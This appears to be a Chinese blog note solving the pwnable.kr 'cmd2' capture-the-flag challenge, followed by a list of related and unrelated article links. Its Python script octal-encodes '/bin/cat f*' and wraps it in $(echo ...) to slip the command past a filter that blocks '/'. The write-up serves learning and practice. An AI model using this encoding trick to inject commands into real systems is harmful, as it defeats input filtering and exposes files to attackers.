pwnable 笔记 Toddler's Bottle - cmd2
来源:互联网 发布:php网站打包app 编辑:程序博客网 时间:2024/06/18 04:33
这题过滤的条件更加严格了,增加了对/的过滤,也就是说输入目录都会被过滤掉,这样通过字符拼接绕过过滤就很难了
google了一下其他方法,发现可以把命令通过八进制编码,然后通过echo 命令输出
解题脚本:(放在/tmp下执行)
#!/usr/bin/python import subprocesscmd = "/bin/cat f*"encode = ""for c in cmd: encode += "\\"+oct(ord(c))# print encodeargs = ["/home/cmd2/cmd2","$(echo \'" + encode + "\')"]# print args[1]subprocess.Popen(args)
0 0
- pwnable 笔记 Toddler's Bottle - cmd2
- pwnable 笔记 Toddler's Bottle - flag
- pwnable 笔记 Toddler's Bottle - passcode
- pwnable 笔记 Toddler's Bottle - random
- pwnable 笔记 Toddler's Bottle - input
- pwnable 笔记 Toddler's Bottle - shellshock
- pwnable 笔记 Toddler's Bottle - cmd1
- pwnable 笔记 Toddler's Bottle - coin1
- pwnable 笔记 Toddler's Bottle - blackjack
- pwnable 笔记 Toddler's Bottle - uaf
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- pwnable.kr [Toddler's Bottle]
- javascript继承方法
- 随机森林,GBDT,Adaboost原理及python实现
- Objective-C中的@dynamic
- Java日志框架:SLF4J, Apache Common-Logging, Log4J和Logback
- Spark操作mongodb
- pwnable 笔记 Toddler's Bottle - cmd2
- 新事物 — RUP
- JSPatch – 动态更新iOS APP
- 【JZOJ4876】【NOIP2016提高A组集训第10场11.8】基因突变
- unity3D游戏开发十四之NGUI一
- LayoutInflater类
- jquery仿京东楼层效果
- Linux电源管理-Linux regulator framework概述
- Java调用命令行并获取执行结果